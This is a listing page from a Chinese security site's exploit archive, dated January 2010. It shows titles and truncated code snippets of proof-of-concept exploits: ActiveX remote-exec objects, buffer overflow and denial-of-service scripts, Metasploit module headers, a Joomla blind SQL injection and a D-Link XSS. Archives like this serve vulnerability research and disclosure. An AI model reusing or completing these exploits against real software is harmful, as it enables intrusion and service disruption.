首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
SPlayer XvidDecoder v3.3 ActiveX Remote Exec 0day PoC
  日期:2010-01-11 10:57:17 点击:26 评论:0
# Author: superli # Tested on: xpsp3 ie6 # Code : object id=TestObj classid=CLSID:{E5960BC4-A76B-4211-BEEC-9AEE2AF8AAE6} style=width:100;height:350/object
Mac OS X versions 10.5 and 10.6 suffers from a buffer overflow vulnerability in
  日期:2010-01-11 10:53:04 点击:49 评论:0
-----BEGIN PGP SIGNED MESSAGE-----Hash: SHA1[ MacOS X 10.5/10.6 libc/strtod(3) buffer overflow ]Author: Maksymilian Arciemowicz and sp3xhttp://SecurityReason.comDate:- - Dis.: 07.05.2009- - Pub.: 08.01.2010CVE: CVE-2009-0689CWE: CWE-119Risk: HighRem
JcomBand toolbar on IE ActiveX Buffer Overflow Exploit
  日期:2010-01-08 11:00:02 点击:48 评论:0
html head titleJcomBand Exploit (heap spray) /title object classid='clsid:952E3F80-0C34-48CD-829B-A45913B29670' id='test'/object script language='javascript' // Author: [germaya_x D3V!L FUCKER] // Version: [2.5] // special thanx: [for my best friend
ttplayer=5.6Beta3 Dos POC
  日期:2010-01-08 10:59:32 点击:38 评论:0
# Exploit Title: ttplayer=5.6Beta3 Dos POC # Date: 2010-01-06 # Author: t-bag YDteam. # Software Link: http://ttplayer.qianqian.com # Version: 5.6Beta3 # Tested on: win7 and win2003 # Code : #!/usr/bin/python #f# t-bag crash = (#ETM3Un+'QQ\1.'+x41
Kantaris 0.5.6 local Denial of service Poc
  日期:2010-01-08 10:58:37 点击:23 评论:0
#!/usr/bin/perl #Kantaris 0.5.6 local Denial of service Poc # # #Author: Teo Manojlovic # #How i find this bug: I was looking for mkv player because i downloaded 13 seasons #of south park. I found Kantaris player and decided to chek it's security. #
Gnome Panel <= 2.28.0 Denial of Service PoC 0-day
  日期:2010-01-07 09:38:46 点击:48 评论:0
# Tested on: ubuntu 9.10 # CVE : # Code : /********************************************************************************* * Gnome panel = 2.28.0 denial of service poc 0-day * * by Pietro Oliva pietroliva@gmail.com * * * * After executing this poc
Total Multimedia Features DoS PoC for Sony Ericsson Phones
  日期:2010-01-07 09:38:16 点击:42 评论:0
Total Multimedia Features DoS PoC for Sony Ericsson Phones. (Should work on almost all of their Models) By Aodrulez. In Sony Ericsson phones(tested on w800i,k750i,w810i), if you simply rename a File with a .sest extension, it achieves System File st
Microsoft HTML Help Compiler (hhc.exe) BOF POC
  日期:2010-01-07 09:37:45 点击:178 评论:0
Microsofts HTML Help Compiler (hhc.exe) is free tool to build Microsoft Compiled HTML Help (.chm) files. It is included within HTML Help Workshop and Visual Studio. The executable, hhc.exe, does not properly check the length of user-supplied command
D-LINK DKVM-IP8 XSS Vulnerability
  日期:2010-01-07 09:37:14 点击:30 评论:0
# Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability # Date: 01-06-2010 # Author: POPCORN # Software Link: http://www.dlink.ru/ # Version: 2282_dlinkA4_p8_20071213 # Tested on: Windows Sp 2 # Site : http://Hacking.ge # Code : POST http://site.com80/aut
DirectAdmin <= 1.33.6 Symlink Permission Bypass
  日期:2010-01-07 09:36:44 点击:57 评论:0
Subject: DirectAdmin = 1.33.6 Symlink Permission Bypass Date: 5/1/21010 Author: alnjm33 Tested on: 1.33.6 -- 1.33.1 and i think it's work in all versions Home:sec-war.com :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::exploit::::::
Apple QuickTime 7.2/7.3 RTSP BOF (Perl)
  日期:2010-01-07 09:36:02 点击:30 评论:0
# Exploit Title: Apple QuickTime 7.2/7.3 RTSP BOF (Perl) # Date: 2009-01-06 # Author: Jacky # Software Link: [downoad link if available] # Version: 7.2/7.3 # Tested on: Windows XP SP3 # CVE : [if exists] # Code : #Apple QuickTime 7.2/7.3 RTSP BOF (Pe
Novell eDirectory 8.8 SP5 (Post Auth) Remote BOF Exploit (0day)
  日期:2010-01-07 09:35:19 点击:47 评论:0
# Exploit Title: Novell eDirectory 8.8 SP5 (Post Auth) Remote BOF Exploit (0day) # Date: 06/01/2010 # Author: His0k4 Simo36 # Version: 8.8 SP5 # Tested on: Windows xp sp3 # Code : #!usrbinperl use WWW::Mechanize; use HTTP::Cookies; use HTTP::Heade
flashget 3.x IEHelper remote exec 0day poc
  日期:2010-01-07 09:34:38 点击:28 评论:0
# Exploit Title:flashget 3.x IEHelper remote exec 0day poc # Date: 2010.01.05 # Author: superli # Version: 3.x # Tested on: xp sp3 # Code : object id=TestObj classid=CLSID:{C6262DCE-6E64-45D2-B080-801F1E298AC2} style=width:100;height:350/object
GOM Audio Local crash poc
  日期:2010-01-07 09:25:46 点击:48 评论:0
# Exploit Title: [GOM Audio Local crash poc] # Date: [2010.01.05] # Author: [applicationlayer@gmail.com] # Version: [all versions] # Tested on: [xp sp3] #!usr/bin/perl $file=poc.cda; $boom=A x 10; open(myfile,$file); print myfile $boom; close(myfile)
PlayMeNow v7.3 and 7.4 Buffer Overflow (meta)
  日期:2010-01-07 09:25:12 点击:28 评论:0
# Tested on: Windows XP SP3 - English # CVE : # Code : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on lice
Joomla Jembed component remote blind SQL injection exploit
  日期:2010-01-06 10:56:06 点击:40 评论:0
?phpini_set(max_execution_time,0);print_r(' \|/// \ - - // ( @ @ )----oOOo--(_)-oOOo---------------------------@~~=Author : FL0RiX @~~=Greez : Dostumuz Yokki yazak@~~=Dork : inurl:com_jembed @~~=Bug : com_jembed (catid) Blind SQL Injection Exploi
Microsoft SQL Server sp_replwritetovarbin Memory Corruption(meta)
  日期:2010-01-06 10:55:05 点击:124 评论:0
### $Id: ms09_004_sp_replwritetovarbin.rb 8068 2010-01-05 00:02:15Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more
BigAnt Server 2.52 USV Buffer Overflow(meta)
  日期:2010-01-06 10:54:30 点击:47 评论:0
### $Id: bigant_server_usv.rb 8071 2010-01-05 11:49:12Z swtornio $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more informati
Novell Netware CIFS And AFP Remote Memory Consumption DoS
  日期:2010-01-06 10:23:44 点击:34 评论:0
#!/usr/bin/perl #Novell Netware CIFS And AFP Remote Memory Consumption DoS #Platform: Novell Netware 6.5 SP8 # Found by Francis Provencher for Protek Research Lab's # http://protekresearch.blogspot.com/ # {PRL} Novell Netware CIFS.nlm Remote Memory
VMware Server Console ActiveX DOS POC
  日期:2010-01-04 11:02:06 点击:39 评论:0
html titleVMware Server Console ActiveX DOS POC/title !-- Author:Shennan Wang blog:http://hi.baidu.com/nansec stuff:http://www.d4rkn3t.cn thanks: Robinh00d,ayarei,void -- head script language=JavaScript function test() { var bufA = 2; var bufB = 0;
共637页/12733条记录 首页 上一页 [399] [400] [401] 402 [403] [404] [405] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved